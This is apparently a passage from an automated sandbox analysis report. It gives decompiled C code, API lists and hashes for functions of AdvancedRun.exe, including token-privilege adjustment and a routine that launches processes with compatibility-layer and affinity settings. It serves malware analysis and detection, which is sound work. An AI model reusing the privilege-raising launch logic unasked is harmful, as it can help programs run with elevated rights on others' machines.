                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004054EC
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                                                                                                                            • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                            • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                            • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405556
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                          • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                                                                                                                          0x00405adf
                                                                                                                                                                                                                          0x00405ae6
                                                                                                                                                                                                                          0x00405af5
                                                                                                                                                                                                                          0x00405af6
                                                                                                                                                                                                                          0x00405afb
                                                                                                                                                                                                                          0x00405b00
                                                                                                                                                                                                                          0x00405b0a
                                                                                                                                                                                                                          0x00405b18
                                                                                                                                                                                                                          0x00405b19
                                                                                                                                                                                                                          0x00405b1e
                                                                                                                                                                                                                          0x00405b2c
                                                                                                                                                                                                                          0x00405b2d
                                                                                                                                                                                                                          0x00405b36
                                                                                                                                                                                                                          0x00405b37
                                                                                                                                                                                                                          0x00405b3c
                                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                                          0x00405b4b
                                                                                                                                                                                                                          0x00405b54
                                                                                                                                                                                                                          0x00405b55
                                                                                                                                                                                                                          0x00405b5a
                                                                                                                                                                                                                          0x00405b68
                                                                                                                                                                                                                          0x00405b69
                                                                                                                                                                                                                          0x00405b72
                                                                                                                                                                                                                          0x00405b73
                                                                                                                                                                                                                          0x00405b7b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405b7b
                                                                                                                                                                                                                          0x00405b80

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Analysis Process: AdvancedRun.exe PID: 6712 Parent PID: 6584 AdvancedRun.exeCOMMON

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                                                                                                                          0x00408fc9
                                                                                                                                                                                                                          0x00408fd0
                                                                                                                                                                                                                          0x00408fe8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408fea
                                                                                                                                                                                                                          0x00408ff4
                                                                                                                                                                                                                          0x00409001
                                                                                                                                                                                                                          0x00409003
                                                                                                                                                                                                                          0x0040900c
                                                                                                                                                                                                                          0x0040900e
                                                                                                                                                                                                                          0x00409010
                                                                                                                                                                                                                          0x0040901a
                                                                                                                                                                                                                          0x0040901a
                                                                                                                                                                                                                          0x00409010
                                                                                                                                                                                                                          0x0040901f
                                                                                                                                                                                                                          0x00409026
                                                                                                                                                                                                                          0x0040902d
                                                                                                                                                                                                                          0x00409030
                                                                                                                                                                                                                          0x00409035
                                                                                                                                                                                                                          0x00409037
                                                                                                                                                                                                                          0x00409040
                                                                                                                                                                                                                          0x00409042
                                                                                                                                                                                                                          0x00409044
                                                                                                                                                                                                                          0x00409051
                                                                                                                                                                                                                          0x00409051
                                                                                                                                                                                                                          0x00409044
                                                                                                                                                                                                                          0x00409053
                                                                                                                                                                                                                          0x0040905e
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                                                                                                                          • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                                                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                                                                          • API String ID: 616250965-1253513912
                                                                                                                                                                                                                          • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                                                                                                                          0x004022d5
                                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                                          0x004022e7
                                                                                                                                                                                                                          0x004022ec
                                                                                                                                                                                                                          0x004022f7
                                                                                                                                                                                                                          0x004022fa
                                                                                                                                                                                                                          0x004022fd
                                                                                                                                                                                                                          0x00402300
                                                                                                                                                                                                                          0x00402307
                                                                                                                                                                                                                          0x0040230d
                                                                                                                                                                                                                          0x0040230e
                                                                                                                                                                                                                          0x00402318
                                                                                                                                                                                                                          0x00402321
                                                                                                                                                                                                                          0x00402324
                                                                                                                                                                                                                          0x00402327
                                                                                                                                                                                                                          0x0040232a
                                                                                                                                                                                                                          0x0040232d
                                                                                                                                                                                                                          0x00402334
                                                                                                                                                                                                                          0x00402337
                                                                                                                                                                                                                          0x0040233e
                                                                                                                                                                                                                          0x0040234f
                                                                                                                                                                                                                          0x00402356
                                                                                                                                                                                                                          0x0040235b
                                                                                                                                                                                                                          0x0040235e
                                                                                                                                                                                                                          0x0040236d
                                                                                                                                                                                                                          0x00402374
                                                                                                                                                                                                                          0x0040237e
                                                                                                                                                                                                                          0x00402395
                                                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                                                          0x004023ac
                                                                                                                                                                                                                          0x004023cf
                                                                                                                                                                                                                          0x004023d2
                                                                                                                                                                                                                          0x004023d9
                                                                                                                                                                                                                          0x004023de
                                                                                                                                                                                                                          0x004023f6
                                                                                                                                                                                                                          0x00402403
                                                                                                                                                                                                                          0x00402414
                                                                                                                                                                                                                          0x00402419
                                                                                                                                                                                                                          0x00402403
                                                                                                                                                                                                                          0x0040241a
                                                                                                                                                                                                                          0x00402423
                                                                                                                                                                                                                          0x00402458
                                                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                                                          0x00402464
                                                                                                                                                                                                                          0x00402467
                                                                                                                                                                                                                          0x00402468
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402425
                                                                                                                                                                                                                          0x00402428
                                                                                                                                                                                                                          0x0040242b
                                                                                                                                                                                                                          0x00402433
                                                                                                                                                                                                                          0x00402434
                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                          0x0040247c
                                                                                                                                                                                                                          0x00402481
                                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                                          0x00402495
                                                                                                                                                                                                                          0x0040249a
                                                                                                                                                                                                                          0x004024b7
                                                                                                                                                                                                                          0x004024be
                                                                                                                                                                                                                          0x004024cd
                                                                                                                                                                                                                          0x004024d1
                                                                                                                                                                                                                          0x004024ed
                                                                                                                                                                                                                          0x004024f0
                                                                                                                                                                                                                          0x00402506
                                                                                                                                                                                                                          0x0040250b
                                                                                                                                                                                                                          0x00402512
                                                                                                                                                                                                                          0x00402518
                                                                                                                                                                                                                          0x00402519
                                                                                                                                                                                                                          0x0040251e
                                                                                                                                                                                                                          0x00402524
                                                                                                                                                                                                                          0x00402527
                                                                                                                                                                                                                          0x0040252b
                                                                                                                                                                                                                          0x00402530
                                                                                                                                                                                                                          0x00402531
                                                                                                                                                                                                                          0x00402531
                                                                                                                                                                                                                          0x0040253d
                                                                                                                                                                                                                          0x0040255a
                                                                                                                                                                                                                          0x00402561
                                                                                                                                                                                                                          0x00402570
                                                                                                                                                                                                                          0x00402574
                                                                                                                                                                                                                          0x00402590
                                                                                                                                                                                                                          0x00402593
                                                                                                                                                                                                                          0x004025a9
                                                                                                                                                                                                                          0x004025ae
                                                                                                                                                                                                                          0x004025b5
                                                                                                                                                                                                                          0x004025bb
                                                                                                                                                                                                                          0x004025bc
                                                                                                                                                                                                                          0x004025c1
                                                                                                                                                                                                                          0x004025c7
                                                                                                                                                                                                                          0x004025ca
                                                                                                                                                                                                                          0x004025cd
                                                                                                                                                                                                                          0x004025ce
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025da
                                                                                                                                                                                                                          0x004025e3
                                                                                                                                                                                                                          0x004025eb
                                                                                                                                                                                                                          0x00402633
                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                          0x00402608
                                                                                                                                                                                                                          0x0040260f
                                                                                                                                                                                                                          0x00402614
                                                                                                                                                                                                                          0x00402624
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x0040263a
                                                                                                                                                                                                                          0x0040263b
                                                                                                                                                                                                                          0x00402646
                                                                                                                                                                                                                          0x0040264b
                                                                                                                                                                                                                          0x0040264c
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265d
                                                                                                                                                                                                                          0x00402666
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402672
                                                                                                                                                                                                                          0x00402675
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x00402683
                                                                                                                                                                                                                          0x0040268b
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x004026a3
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x004026b5
                                                                                                                                                                                                                          0x004026b8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ba
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026bf
                                                                                                                                                                                                                          0x004026c1
                                                                                                                                                                                                                          0x004026c6
                                                                                                                                                                                                                          0x004026cc
                                                                                                                                                                                                                          0x004026d5
                                                                                                                                                                                                                          0x004026db
                                                                                                                                                                                                                          0x004026e4
                                                                                                                                                                                                                          0x004026ea
                                                                                                                                                                                                                          0x004026f3
                                                                                                                                                                                                                          0x004026f9
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x0040270d
                                                                                                                                                                                                                          0x00402710
                                                                                                                                                                                                                          0x0040276d
                                                                                                                                                                                                                          0x00402770
                                                                                                                                                                                                                          0x0040280b
                                                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                                                          0x00402813
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402819
                                                                                                                                                                                                                          0x0040281f
                                                                                                                                                                                                                          0x00402836
                                                                                                                                                                                                                          0x00402841
                                                                                                                                                                                                                          0x00402846
                                                                                                                                                                                                                          0x0040284a
                                                                                                                                                                                                                          0x00402851
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402860
                                                                                                                                                                                                                          0x00402865
                                                                                                                                                                                                                          0x00402876
                                                                                                                                                                                                                          0x00402879
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402891
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x00402779
                                                                                                                                                                                                                          0x00402784
                                                                                                                                                                                                                          0x0040278d
                                                                                                                                                                                                                          0x004027a4
                                                                                                                                                                                                                          0x004027b3
                                                                                                                                                                                                                          0x004027b8
                                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027d1
                                                                                                                                                                                                                          0x004027d6
                                                                                                                                                                                                                          0x004027d9
                                                                                                                                                                                                                          0x004027db
                                                                                                                                                                                                                          0x004027e2
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e7
                                                                                                                                                                                                                          0x004027f4
                                                                                                                                                                                                                          0x004027fc
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00402715
                                                                                                                                                                                                                          0x00402729
                                                                                                                                                                                                                          0x0040272e
                                                                                                                                                                                                                          0x00402731
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402743
                                                                                                                                                                                                                          0x00402748
                                                                                                                                                                                                                          0x0040274d
                                                                                                                                                                                                                          0x00402754
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402759
                                                                                                                                                                                                                          0x00402763
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402763
                                                                                                                                                                                                                          0x004026fb
                                                                                                                                                                                                                          0x00402700
                                                                                                                                                                                                                          0x00402702
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402702
                                                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                                                          0x004026ce
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ce
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x00402443
